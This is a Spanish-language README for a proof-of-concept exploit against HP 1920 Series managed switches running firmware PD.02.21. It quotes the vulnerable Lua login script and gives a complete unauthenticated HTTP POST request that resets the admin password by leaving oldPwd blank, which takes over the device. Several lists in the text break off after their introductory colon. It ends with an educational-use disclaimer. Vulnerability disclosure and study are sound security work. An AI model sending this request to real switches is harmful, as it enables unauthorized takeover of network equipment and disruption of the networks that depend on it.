
Exploit de prueba de concepto para un bypass de autenticación en switches HP 1920 Series, que permite cambiar la contraseña de administrador sin autenticación mediante una solicitud HTTP POST manipulada.
Versión de firmware: PD.02.21
Dispositivos afectados: Switches Gestionados Inteligentes Serie HP 1920
Este repositorio documenta una vulnerabilidad crítica de bypass de autenticación en los Switches Gestionados Inteligentes Serie HP 1920 que ejecutan la versión de firmware PD.02.21. La vulnerabilidad permite que un atacante no autenticado cambie la contraseña de administrador sin autenticación previa, lo que efectivamente permite la toma completa del dispositivo.
La vulnerabilidad existe en el script /login/default_password_cfg.lua, que maneja el cambio de la contraseña predeterminada del dispositivo. Este script:
oldPwd coincida con la contraseña predeterminada (que está en blanco/vacía)La sección vulnerable clave en default_password_cfg.lua:
if (request_method == 'POST') then
-- No authentication or session checks!
local defaultPassword = fpaux.string_const("FD_USER_MGR_DEFAULT_PASSWORD")
-- ...
if form_post.oldPwd ~= defaultPassword then
errorStatus = "401 Unauthorized"
errorText = label.old_password_mismatch
else
-- Proceeds to change password
-- ...
end
end
El script carece de controles de seguridad críticos:
Un atacante puede explotar esta vulnerabilidad usando una simple solicitud HTTP POST:
POST /login/default_password_cfg.lua HTTP/1.1
Host: [target-ip]
Content-Type: application/x-www-form-urlencoded
Content-Length: [length]
username=admin&oldPwd=&newPwd=[new-password]&confirmPwd=[new-password]
Nota: El parámetro oldPwd se deja vacío ya que la contraseña predeterminada está en blanco.
Esta vulnerabilidad permite que un atacante no autenticado:
No he tenido tiempo de investigar quién descubrió originalmente esta vulnerabilidad, solo estoy publicando una Prueba de Concepto.
Esta información se proporciona únicamente con fines educativos. El autor no es responsable por el mal uso de esta información. Siempre obtenga la autorización adecuada antes de realizar pruebas de vulnerabilidades.